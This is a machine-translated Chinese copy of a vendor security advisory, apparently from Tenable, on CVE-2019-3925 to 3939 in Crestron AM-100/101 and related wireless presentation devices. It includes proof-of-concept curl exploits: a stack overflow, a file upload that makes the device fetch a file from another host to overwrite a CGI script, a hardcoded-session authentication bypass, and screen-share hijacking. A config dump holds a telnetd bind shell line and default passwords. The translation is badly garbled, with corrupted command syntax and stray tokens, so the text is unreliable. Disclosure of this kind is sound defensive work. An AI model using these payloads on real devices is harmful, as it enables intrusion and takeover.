OEM演示平台的漏洞

站得住脚的发现多个漏洞虽然调查快思聪是- 100。站得住脚的还发现,快思聪am - 100与Barco wePresent共享代码库,爱思创ShareLink,富可视LiteShow,可AV WIPS710,锋利的PN-L703WA, Optoma WPS-Pro,黑箱高清WPS,可能还有别人。下面列出的漏洞不影响所有设备。特地成立了全力的平台有哪些影响每一个漏洞。

cve - 2019 - 3925: SNMP命令注入# 1

远程,未经身份验证的攻击者可以将操作系统命令的快思聪am - 100固件固件2.7.0.2 1.6.0.2和am - 101。通过iso.3.6.1.4.1.3212.100.3.2.9.3 OID漏洞出现在SNMP。命令注入是炮击的结果了/bin/ftpfw.sh。

cve - 2019 - 3926: SNMP命令注入# 2

远程,未经身份验证的攻击者可以将操作系统命令theCrestron am - 100固件固件2.7.0.2 1.6.0.2和am - 101。通过iso.3.6.1.4.1.3212.100.3.2.14.1 OID漏洞出现在SNMP。命令注入是炮击的结果了/bin/getRemoteURL.sh。

cve - 2019 - 3927:未经身份验证的通过SNMP管理密码更改

远程,未经身份验证的攻击者可以改变管理和主持人密码的web界面快思聪am - 100固件固件2.7.0.2 1.6.0.2和am - 101。通过iso.3.6.1.4.1.3212.100.3.2.8.1漏洞出现在SNMP和iso.3.6.1.4.1.3212.100.3.2.8.2 oid。下面的概念证明显示了用户登录,默认“admin”密码,然后与一个新的密码。

cve - 2019 - 3928:演示代码通过SNMP泄漏

远程,未经身份验证的攻击者可以获得表示代码快思聪am - 100固件固件2.7.0.2 1.6.0.2和am - 101。通过iso.3.6.1.4.1.3212.100.3.2.7.4漏洞出现在SNMP。允许攻击者的代码视图锁定演示或成为一个主持人。

cve - 2019 - 3929:未经身份验证的远程命令注入通过HTTP

远程,未经身份验证的攻击者可以通过精心设计作为根用户执行操作系统命令请求file_transfer.cgi HTTP端点。这个漏洞似乎影响到所有已知的设备包括快思聪am - 100固件1.6.0.2,快思聪am - 101固件2.7.0.1 Barco wePresent wipg - 1000固件2.3.0.10 Barco wePresent wipg - 1600固件2.4.1.19之前,爱思创ShareLink固件2.0.3.4 200/250,可AV WIPS710固件1.1.0.7,夏普PN-L703WA固件1.4.2.3 Optoma WPS-Pro固件1.0.0.5黑箱高清WPS固件1.0.0.5,富可视LiteShow3固件1.0.16和富可视LiteShow4 2.0.0.7

cve - 2019 - 3930:未经身份验证的远程通过HTTP堆栈缓冲区溢出

这个函数PARSERtoCHAR在libAwCgi.so是在多种环境中由HTTP cgi脚本调用。有时没有身份验证(file_transfer.cgi),有时与身份验证(return.cgi)。CGI脚本,通过这个函数输入超过0 x100字节缓冲区溢出堆栈。下面的概念证明显示远程,未经身份验证的攻击者触发这个bug。

curl - v -头“内容类型:应用程序/ x-www-form-urlencoded”\——请求邮报\数据“file_transfer = new&dir = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaPa_NoteaaaaaaaaaaaaaaPa_Noteaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \——不安全的https://192.168.88.250/cgi-bin/file_transfer.cgi

产生以下回跟踪:

核心是由“/ home /银行/目录/ file_transfer.cgi”。程序终止与SIGSEGV段错误。# 0 0 x61616160 ? ?()(gdb) bt # 0 0 x61616160 ? ?()# 1 0 x4003ffc4取代从/lib/libAwCgi. ()所以# 2 0 x61616160在? ?()回溯停止:前一帧与帧(腐败的堆栈吗?)(gdb)

这个漏洞似乎影响到所有已知的设备包括快思聪am - 100固件1.6.0.2,快思聪am - 101固件2.7.0.1 Barco wePresent wipg - 1000固件2.3.0.10 Barco wePresent wipg - 1600固件2.4.1.19之前,爱思创ShareLink固件2.0.3.4 200/250,可AV WIPS710固件1.1.0.7,夏普PN-L703WA固件1.4.2.3 Optoma WPS-Pro固件1.0.0.5黑箱高清WPS固件1.0.0.5,富可视LiteShow3固件1.0.16和富可视LiteShow4 2.0.0.7。

cve - 2019 - 3931:通过HTTP身份验证的远程文件上传

快思聪am - 100 1.6.0.2和am - 101 2.7.0.1收到一个补丁来修复cve - 2017 - 16709。补丁试图防止命令注入过滤操作系统命令。然而,这个补丁并非完全成功,验证攻击者仍然可以提供任意参数旋度。这允许经过身份验证的攻击者上传任何文件到设备。此外,/home/boa/cgi-bin/目录可写攻击者可以很容易地实现代码执行。

以下的概念:

curl——头“内容类型:应用程序/ x-www-form-urlencoded”\——请求邮报\数据”命令= <发送> < seid > fAEI0CHTDTHKcDVD < / seid > <上传> <协议> ftp < /协议> <地址> http://192.168.88.248:1270Pa_Note http://192.168.88.248:1270 lol。cgi - o /home/boa/cgi-bin/file_transfer.cgi1270lollol/tmp/wat" \ --insecure https://192.168.88.250/cgi-bin/return.cgi

会导致在设备上执行以下命令:

sh /usr/bin/curl - k - o / tmp /例子。ogg http://192.168.88.248:1270;http://192.168.88.248:1270 lol。cgi - o /home/boa/cgi-bin/file_transfer.cgi

lol。文件上传和file_transfer cgi。cgi是覆盖的文件

cve - 2019 - 3932:在return.tgi认证绕过

的return.tgi脚本/home/boa/tgi/允许远程攻击者绕过身份验证的硬编码的sessionIDtrLVy9Gh82KDHoy快思聪的am - 100固件固件2.7.0.2 1.6.0.2和am - 101。返回。家通过uart_bridge控制外部设备。绕过样本如下:

curl——头“内容类型:应用程序/ x-www-form-urlencoded”\——请求邮报\数据”命令= session&trLVy9Gh82KDHoy9&beef100500 2222010005”——不安全的https://192.168.88.250/tgi/return.tgi

cve - 2019 - 3933:远程视图登录绕过# 1

未经过身份验证的远程攻击者可以绕过远程视图“登录”(摄于cve - 2019 - 3928)只需导航http:// (ip地址)/图片/ browserslide.jpg。screenshare也将缓存的最终的图像在这个位置即使表示已经完成。如果表示重新启动以来没有发生那么此页面将是404。这个漏洞是影响快思聪am - 100固件1.6.0.2和快思聪am - 101固件2.7.0.1。

cve - 2019 - 3934:删除视图登录绕过# 2

未经过身份验证的远程攻击者可以绕过远程视图“登录”(摄于cve - 2019 - 3928)和向下滑动图像通过执行以下HTTP请求:

curl——头“内容类型:应用程序/ x-www-form-urlencoded”\——请求邮报\ \——不安全的“浏览器=客户端数据https://192.168.88.250/cgi-bin/login.cgi?lang=en&src=lol。html " > slideshow_img.jpg

这个漏洞是影响快思聪am - 100固件1.6.0.2和快思聪am - 101固件2.7.0.1

cve - 2019 - 3935:未经身份验证的远程主持人控制

未经过身份验证的远程攻击者可以停止、启动和断开任何屏幕共享会话认证检查在主持人控制不足。以下命令演示这个功能的快思聪am - 100固件1.6.0.2和快思聪am - 101固件2.7.0.1。注意,第一个请求为攻击者提供了“主键”屏幕共享会话。

albinolobster@ubuntu: ~ $ curl——头“内容类型:应用程序/ x-www-form-urlencoded”请求后,数据“会议”——不安全的“https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html”
               
                3
               
                0
               
                0
               
               
                0
               
                192.168.88.247
               
                4
               
                1
              albinolobster@ubuntu: ~ $ curl——头“内容类型:应用程序/ x-www-form-urlencoded”请求后,数据“userid = 4行动=停止”——不安全的“https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html”
               成功albinolobster@ubuntu: ~ $ curl——头“内容类型:应用程序/ x-www-form-urlencoded”请求后,数据“userid = 4行动= PlayImage”——不安全的“https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html”
               成功albinolobster@ubuntu: ~ $ curl——头“内容类型:应用程序/ x-www-form-urlencoded”请求后,数据“userid = 4行动=断开”——不安全的“https://192.168.88.250/cgi-bin/conference.cgi?lang=en&src=lol.html”
               成功

cve - 2019 - 3936:未经身份验证的远程视图拒绝服务

未经过身份验证的远程攻击者可以停止一个屏幕共享通过发送字符串wppcmd \ x00 \ x00 \ xa0 \ x00 \ x00 \ x00TCP端口389。请求需要大约2分钟通过,但是在那个时期屏幕共享转换到“停止”状态。

cve - 2019 - 3937:存储在明文中的凭据

该文件/ tmp / scfgdndf存储用户名、密码和明文。也许在正常情况下这不会太有关,但与多个未经身份验证的漏洞影响设备,包括一个文件包含漏洞,这变得更加担忧。下面是一个示例文件的内容。注意,“modpass”和“adminpass”时使用的密码倾销这个文件。

/ tmp / tmp / #字符串scfgdndf WPS820 100111101110001快思聪AirMedia WiPG1K5s 8888 # FFFFFF AirMedia-0e58c9默认am - 100用户培训师管理sh - b 0.0.0.0:1270私人用户authpass privpass公共GMT-8_CH 0.0.0.0 modpass adminpass http://192.168.88.253:1270; telnetd - l /bin/sh - b 0.0.0.0:1270

这个漏洞是影响快思聪am - 100固件1.6.0.2和快思聪am - 101固件2.7.0.1。

cve - 2019 - 3938:出口凭证可恢复

平台允许管理员导出和导入配置文件。设备在配置文件中存储用户凭证。配置文件很容易使用供应商的解码awenc工具。解码后,管理员密码显示(“lolwat”下面的PoC)。这个漏洞是影响快思聪am - 100固件1.6.0.2和快思聪am - 101固件2.7.0.1。

albinolobster@ubuntu: ~ $ sudo chroot。。/ qemu-arm-static /bin/awenc - h编码/解码文件awenc用法:awenc[选项]我;(文件名)——输入:输入文件- o;——(文件名)输出:输出文件- d;——解码:解码- e;——编码:编码- g;——得到:头- h;——帮助:打印此消息albinolobster@ubuntu: ~ $ sudo chroot。/ qemu-arm-static /bin/awenc - d - i /系统。conf - o。/出AWENC [0:29:38.124]——AWDEC:文件操作开始AWENC[0:29:38.127]——完成检查原始的头。AWENC[0:29:38.128]——开始Enc / 12月AWENC [0:29:38.129]——FILE_OPERATION结束AWENC[0:29:38.129]——完成检查恢复。AWENC [0:29:38.129]——AW_DEC:完成创建文件。 albinolobster@ubuntu:~$ cat out | grep PWD 
             
cve - 2019 - 3939:默认凭证
             
设备使用默认凭据“管理:管理”管理用户和版主的“主持人:主持人”用户。
             
cve - 2017 - 16709:验证命令注入
             
2018年6月,快思聪修补经过身份验证的远程命令注入漏洞,被分配cve - 2017 - 16709。通过补丁分析,站得住脚的相信这通过HTTP命令注入漏洞。其他设备的分析显示他们不修补这个漏洞。